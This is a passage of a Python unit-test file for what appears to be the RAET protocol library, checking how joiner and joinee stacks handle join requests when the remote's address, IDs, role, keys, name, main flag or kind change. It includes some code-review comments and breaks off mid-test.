self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptNewRha(self):
'''
Test mutable joiner accept non vacuous join with updated host address (K4)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewRha.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Always
alpha, beta = self.bootstrapJoinedRemotes(autoMode=raeting.AutoMode.always.value)
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: Either
# Kind: Either
# RHA: New
# 1. Initiate join with initHa
# 2. Set betaRemote.ha = fakeHa
# 3. Accept alpha responce:
# - alpha will respond with initHa
# - beta will know fakeHa
initHa = alpha.local.ha
fakeHa = ('127.0.0.5', alpha.local.ha[1])
self.assertNotEqual(initHa, fakeHa)
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
# Mutable: Yes
beta.mutable = True
# Vacuous: No
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: No
console.terse("\nJoin Transaction **************\n")
beta.join(uid=betaRemote.nuid)
betaRemote.ha = fakeHa
# Keep beta values here, before accept. Accept will change it because not same all
keep = self.copyData(betaRemote)
self.serviceStacks([alpha, beta])
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.ha, alpha.local.ha)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptNewFuid(self):
'''
Test mutable joiner accept non vacuous join with updated host fuid/reid (K5)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewFuid.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Always
alpha, beta = self.bootstrapJoinedRemotes(autoMode=raeting.AutoMode.always.value)
alphaRemote = alpha.remotes.values()[0]
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: New:
# 1. Initiate join with initFuid
# 2. Update betaRemote.fuid = fakeFuid
# 3. Accept alpha responce:
# - alpha will respond with initFuid
# - beta will know fakeFuid
initFuid = alphaRemote.nuid
fakeFuid = initFuid + 10
# Leid: Old
# Reid: New
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote, fuid=fakeFuid)
# Mutable: Yes
beta.mutable = True
# Vacuous: No
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
# Renew: No
console.terse("\nJoin Transaction **************\n")
beta.join(uid=betaRemote.nuid)
betaRemote.fuid = fakeFuid
self.serviceStacks([alpha, beta])
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.fuid, initFuid)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptNewRole(self):
'''
Test mutable joiner accept non vacuous join with updated role (K6)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewRole.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Either
# Main: Either
# Kind: Either
# RHA: Old
# Nuid: Old
# Fuid: Body
# Leid: Old
# Reid: 0
# Role: New
oldRole = alpha.local.role
newRole = '{0}_new'.format(oldRole)
alpha.local.role = newRole
alpha.dumpLocalRole()
# Keys: Either
# Sameness: Not sameall, not same role/keys
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: No
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(oldRole)
self.assertEqual(roleData['role'], oldRole)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
roleData = beta.keep.loadRemoteRoleData(newRole)
self.assertEqual(roleData['role'], newRole)
self.assertIs(roleData['acceptance'], None)
self.assertEqual(roleData['verhex'], None)
self.assertEqual(roleData['pubhex'], None)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertFalse(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.role, newRole)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptNewKeys(self):
'''
Test mutable joiner accept non vacuous join with updated keys (K7)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptNewKeys.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Always
alpha, beta = self.bootstrapJoinedRemotes(autoMode=raeting.AutoMode.always.value)
betaRemote = beta.remotes.values()[0]
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Name: Either
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Old
# Keys: New
alpha.local.signer = nacling.Signer()
alpha.local.priver = nacling.Privateer()
alpha.dumpLocalRole()
# Sameness: Not sameall, not same role/keys
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Vacuous: No
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertFalse(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.verfer.keyhex, alpha.local.signer.verhex)
self.assertEqual(betaRemote.pubber.keyhex, alpha.local.priver.pubhex)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousAcceptSameAll(self):
'''
Test joiner accept non vacuous join with same all (L1)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousAcceptSameAll.__doc__))
# Status: Accepted (auto accept keys)
# Mode: Never, Once, Always
alpha, beta = self.bootstrapJoinedRemotes()
betaRemote = beta.remotes.values()[0]
# Name: Old
# Main: Old
# Kind: Old
# RHA: Old
# Nuid: Old
# Fuid: Old
# Leid: Old
# Reid: Old
# Role: Old
# Keys: Old
# Sameness: SameAll
keep = self.copyData(betaRemote)
# Mutable: Either
# Vacuous: No
# Ensure remote status is Accepted
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Accept, Dump
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
self.assertIs(stack.mutable, None)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertTrue(self.sameAll(betaRemote, keep))
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 2)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 2)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousPendingPendNewName(self):
'''
Test mutable joiner pend pending vacuous join with updated name (M1)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendNewName.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Pending
beta.keep.pendRemote(betaRemote)
# Name: New
oldName = alpha.name
newName = '{0}_new'.format(oldName)
alpha.name = newName
# Main: Either
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid, duration=0.50)
# Action: Pend, Dump
for stack in [alpha, beta]:
# self.assertEqual(len(stack.transactions), 1) #b=0
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.name, newName)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousPendingPendNewMain(self):
'''
Test mutable joiner pend pending non vacuous join with updated main (M2)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendNewMain.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: No
# Main: New (set main to false in betaRemote)
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=False,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Pending
beta.keep.pendRemote(betaRemote)
# Name: Either
# Main: New
# Kind: Either
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid, duration=0.50)
# Action: Pend, Dump
for stack in [alpha, beta]:
# self.assertEqual(len(stack.transactions), 1) #b=0
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.main, alpha.main)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
def testJoinerNonVacuousPendingPendNewKind(self):
'''
Test mutable joiner pend pending non vacuous join with updated kind (M3)
'''
console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendNewKind.__doc__))
# Mode: Never
alpha, beta = self.bootstrapStacks()
beta.keep.auto = raeting.AutoMode.never.value
# Vacuous: No
betaRemote = estating.RemoteEstate(stack=beta,
fuid=0,
sid=0, # always 0 for join
ha=alpha.local.ha,
main=True,
name=alpha.name,
verkey=alpha.local.signer.verhex,
pubkey=alpha.local.priver.pubhex)
alphaRemote = estating.RemoteEstate(stack=beta,
fuid=betaRemote.nuid,
ha=beta.local.ha,
name=beta.name,
verkey=beta.local.signer.verhex,
pubkey=beta.local.priver.pubhex)
betaRemote.fuid = alphaRemote.nuid
alpha.addRemote(alphaRemote)
beta.addRemote(betaRemote)
# Status: Pending
beta.keep.pendRemote(betaRemote)
# Name: Either
# Main: Either
# Kind: New
oldKind = alpha.kind
newKind = 33
self.assertIs(alpha.kind, oldKind)
alpha.kind = newKind
# RHA: Either
# Nuid: Old
# Fuid: Either
# Leid: Old
# Reid: Either
# Role: Either
# Keys: Either
# Sameness: Not sameall
keep = self.copyData(betaRemote)
# Mutable: Yes
beta.mutable = True
# Ensure remote status is Pending
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
# Test
self.join(beta, alpha, deid=betaRemote.nuid)
# Action: Pend, Dump
for stack in [alpha, beta]:
# self.assertEqual(len(stack.transactions), 1) #b=0
self.assertEqual(len(beta.remotes), 1)
self.assertEqual(len(beta.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertIs(remote.joined, None)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertFalse(self.sameAll(betaRemote, keep))
self.assertTrue(self.sameRoleKeys(betaRemote, keep))
self.assertEqual(betaRemote.kind, newKind)
self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.pending.value)
self.assertEqual(ns2b(roleData['verhex']), betaRemote.verfer.keyhex)
self.assertEqual(ns2b(roleData['pubhex']), betaRemote.pubber.keyhex)
# Accept the transaction
console.terse("\nAccept Transaction **************\n")
beta.keep.acceptRemote(betaRemote)
self.serviceStacks([alpha, beta], duration=3.0)
for stack in [alpha, beta]:
self.assertEqual(len(stack.transactions), 0)
self.assertEqual(len(stack.remotes), 1)
self.assertEqual(len(stack.nameRemotes), 1)
for remote in stack.remotes.values():
self.assertTrue(remote.joined)
self.assertIs(remote.allowed, None)
self.assertIs(remote.alived, None)
self.assertEqual(remote.acceptance, raeting.Acceptance.accepted.value)
self.assertIs(alpha.mutable, None)
self.assertTrue(beta.mutable)
self.assertIn('join_correspond_complete', alpha.stats)
self.assertEqual(alpha.stats['join_correspond_complete'], 1)
self.assertIn('join_initiate_complete', beta.stats)
self.assertEqual(beta.stats['join_initiate_complete'], 1)
# Check remote dump
remoteData = beta.keep.loadRemoteData(alpha.local.name)
remoteData['ha'] = tuple(remoteData['ha'])
self.assertTrue(self.sameAll(betaRemote, remoteData))
# Check role/keys dump
roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
self.assertEqual(roleData['role'], alpha.local.role)
self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
for stack in [alpha, beta]:
stack.server.close()
stack.clearAllKeeps()
    def testJoinerNonVacuousPendingPendNewRha(self):
        '''
        Test mutable joiner pend pending non vacuous join with updated host address (M4)
        '''
        console.terse("{0}\n".format(self.testJoinerNonVacuousPendingPendNewRha.__doc__))
        # Mode: Never
        alpha, beta = self.bootstrapStacks()
        beta.keep.auto = raeting.AutoMode.never.value
        # Vacuous: No
        # Pre-create beta's remote for alpha so the join is non-vacuous
        betaRemote = estating.RemoteEstate(stack=beta,
                                           fuid=0,
                                           sid=0, # always 0 for join
                                           ha=alpha.local.ha,
                                           main=True,
                                           name=alpha.name,
                                           verkey=alpha.local.signer.verhex,
                                           pubkey=alpha.local.priver.pubhex)
        # NOTE(review): stack=beta looks like a copy/paste slip (this is
        # alpha's remote for beta, registered on alpha below) -- confirm
        # whether RemoteEstate uses its stack attribute after addRemote()
        alphaRemote = estating.RemoteEstate(stack=beta,
                                            fuid=betaRemote.nuid,
                                            ha=beta.local.ha,
                                            name=beta.name,
                                            verkey=beta.local.signer.verhex,
                                            pubkey=beta.local.priver.pubhex)
        betaRemote.fuid = alphaRemote.nuid
        alpha.addRemote(alphaRemote)
        beta.addRemote(betaRemote)
        # Status: Pending
        beta.keep.pendRemote(betaRemote)
        # Name: Either
        # Main: Either
        # Kind: Either
        # RHA: New
        # 1. Initiate join with initHa
        # 2. Set betaRemote.ha = fakeHa
        # 3. Accept alpha responce:
        #    - alpha will respond with initHa
        #    - beta will know fakeHa
        initHa = (alpha.local.ha[0], alpha.local.ha[1])
        fakeHa = (alpha.local.ha[0], 7532)
        self.assertNotEqual(initHa, fakeHa)
        # Nuid: Old
        # Fuid: Either
        # Leid: Old
        # Reid: Either
        # Role: Either
        # Keys: Either
        # Sameness: Not sameall
        # Mutable: Yes
        beta.mutable = True
        # Ensure remote status is Pending
        roleData = beta.keep.loadRemoteRoleData(alpha.local.role)
        self.assertEqual(roleData['role'], alpha.local.role)
        self.assertIs(roleData['acceptance'], raeting.Acceptance.pending.value)
        self.assertEqual(ns2b(roleData['verhex']), alpha.local.signer.verhex)
        self.assertEqual(ns2b(roleData['pubhex']), alpha.local.priver.pubhex)
        # Test
        console.terse("\nJoin Transaction **************\n")
        beta.join(uid=betaRemote.nuid)
        # Overwrite the remote host address after the join packet is queued,
        # so the accept response arrives from a different (the real) RHA
        betaRemote.ha = fakeHa
        # Keep beta values here, before accept. Accept will change it because not same all
        keep = self.copyData(betaRemote)
        self.serviceStacks([alpha, beta], duration=0.50)
        # Action: Pend, Dump
        for stack in [alpha, beta]:
            # self.assertEqual(len(stack.transactions), 1) #b=0
            # NOTE(review): these two checks use beta, not the loop var
            # 'stack', so beta is re-checked each pass -- confirm intent
            self.assertEqual(len(beta.remotes), 1)
            self.assertEqual(len(beta.nameRemotes), 1)
            for remote in stack.remotes.values():
                self.assertIs(remote.joined, None)
                self.assertIs(remote.allowed, None)
                self.assertIs(remote.alived, None)
        self.assertIs(alpha.mutable, None)
        self.assertTrue(beta.mutable)
        # The mutable joiner applied alpha's RHA: role/keys unchanged, ha updated
        self.assertFalse(self.sameAll(betaRemote, keep))
        self.assertTrue(self.sameRoleKeys(betaRemote, keep))
        self.assertEqual(betaRemote.ha, alpha.local.ha)
        self.assertIs(alphaRemote.acceptance, raeting.Acceptance.accepted.value)
        self.assertIs(betaRemote.acceptance, raeting.Acceptance.pending.value)
        # Check remote dump
